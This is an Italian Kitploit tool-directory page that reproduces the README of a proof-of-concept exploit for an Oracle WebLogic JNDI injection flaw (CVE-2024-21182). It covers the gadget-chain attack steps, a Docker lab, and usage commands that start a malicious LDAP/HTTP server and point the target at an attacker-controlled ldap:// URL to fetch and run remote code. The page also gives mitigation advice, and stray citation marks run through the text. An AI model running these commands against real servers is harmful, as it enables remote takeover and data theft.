Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE — Exploit proof-of-concept per CVE-2024-21182, un'iniezione JNDI non autenticata che porta all'esecuzione di codice remoto in Oracle WebLogic Server tramite i protocolli T3/IIOP. Include un laboratorio Docker per i test. | Kitploit
Strumenti/GitHubGitHub/fevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo PayloadLab e Pratica
GitHubfevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce

CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE

Exploit proof-of-concept per CVE-2024-21182, un'iniezione JNDI non autenticata che porta all'esecuzione di codice remoto in Oracle WebLogic Server tramite i protocolli T3/IIOP. Include un laboratorio Docker per i test.

Vedi Repository
23 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE

CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE

CVE-2024-21182 CVSS CISA KEV

📋 Descrizione

CVE-2024-21182 è una vulnerabilità di iniezione JNDI non autenticata che colpisce il componente Core di Oracle WebLogic Server. Consente a un attaccante remoto, tramite i protocolli T3 o IIOP, di eseguire codice arbitrario (RCE) sul server, potendo ottenere accesso completo a tutti i dati del server[citation:5][citation:8][citation:9].

Questo repository contiene un Proof of Concept (PoC) funzionante che dimostra lo sfruttamento riuscito della patch di CVE-2023-21839 mediante la catena di gadget AggregatableOpaqueReference + MessageDestinationReference[citation:2][citation:4].

🚨 Dettagli della Vulnerabilità

AttributoValore
CVECVE-2024-21182
ProdottoOracle WebLogic Server (Core)
Versioni interessate12.2.1.4.0 e 14.1.1.0.0[citation:7]
Patch disponibileOracle Critical Patch Update (Luglio 2024 e Ottobre 2024)[citation:6]
Stato in CISA KEVSfruttamento attivo confermato (aggiunta il 01/06/2026)[citation:3][citation:8]
Data limite di mitigazione (CISA)04/06/2026[citation:8]

Vettore d'Attacco

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • Rete (AV:N): Sfruttabile da remoto
  • Bassa complessità (AC:L): Nessuna condizione speciale
  • Senza autenticazione (PR:N): Accesso anonimo
  • Senza interazione dell'utente (UI:N): Sfruttamento passivo

⚙️ Fasi dell'Attacco

Fase 1: Riconoscimento: Identificare server WebLogic con le porte T3/IIOP (7001) esposte.

Fase 2: Analisi: Determinare se il server esegue una versione vulnerabile (12.2.1.4.0 o 14.1.1.0.0) o manca della patch di Ottobre 2024.

Fase 3: Sfruttamento (flusso tecnico):

  1. Costruzione del Gadget: L'attaccante crea un oggetto AggregatableOpaqueReference[citation:2].
  2. Iniezione di Riferimento: Tramite reflection (Java), viene modificato il campo privato referent dell'oggetto precedente in modo che punti a un MessageDestinationReference malevolo[citation:4].
  3. Bind e Lookup: L'oggetto malevolo viene "incatenato" (bind) nell'albero JNDI del server e poi "cercato" (lookup).
  4. Risoluzione JNDI: Durante la ricerca dell'oggetto, il server esegue una nuova query JNDI verso l'URL controllato dall'attaccante (server LDAP).
  5. Server LDAP: Risponde con un riferimento a un codice Java ospitato sul server HTTP dell'attaccante.
  6. Esecuzione del Codice: Il server WebLogic scarica e istanzia la classe Java, eseguendone il contenuto nel contesto della macchina vittima.

🛠️ Prerequisiti

  • Docker e Docker Compose: Per l'ambiente di test isolato[citation:2].
  • JDK 8 o superiore: Per compilare ed eseguire il client T3.
  • Client T3 di WebLogic: wlthint3client.jar (può essere estratto da un'installazione di WebLogic).

🚀 Utilizzo del PoC

Ambiente di Laboratorio (Docker)

root@kitploit:~
# 1. Clonare il repository
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182

# 2. Avviare il laboratorio (vittima + attaccante)
docker-compose up -d

# 3. Eseguire lo sfruttamento automatico
./validate.sh

Sfruttamento contro un obiettivo reale (autorizzato)

root@kitploit:~
# 1. Avviare il server LDAP/HTTP malevolo
python3 exploit/ldap_server.py

# 2. In un altro terminale, eseguire il payload Java
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil

📊 Impatto Dimostrato

  • Esecuzione remota di comandi (RCE) sul server
  • Accesso non autorizzato a dati critici dell'applicazione
  • Compromissione completa del server applicativo
  • Potenziale punto di ingresso per movimento laterale nella rete aziendale
  • Base per distribuzione di ransomware o altri carichi malevoli

Stato attuale secondo CISA: "Known To Be Used in Ransomware Campaigns? Unknown" (Ma tipicamente sì, le RCE nei middleware sono vettori iniziali nelle intrusioni ransomware).

🛡️ Mitigazione

  • Patch immediata: Applicare il Critical Patch Update di Oracle di Ottobre 2024 o successivo.
  • Restrizione di rete: Bloccare/limitare l'accesso alle porte T3/IIOP (es. 7001) solo a origini fidate.
  • Monitoraggio: Rilevare tentativi di bind/lookup insoliti nell'albero JNDI.

⚠️ Avviso Legale

Questo codice è esclusivamente a scopo educativo e di ricerca. L'uso improprio di questo PoC contro sistemi senza autorizzazione espressa è illegale. L'autore non si assume responsabilità per l'uso improprio di queste informazioni.

📚 Riferimenti

  • NVD - CVE-2024-21182
  • CISA KEV Catalog
  • Oracle Security Advisory
  • Analisi tecnica originale

🤝 Crediti

  • Ricercatore originale che ha scoperto la catena di gadget
  • dinosn per il laboratorio riproducibile in Docker
Scarica lo strumento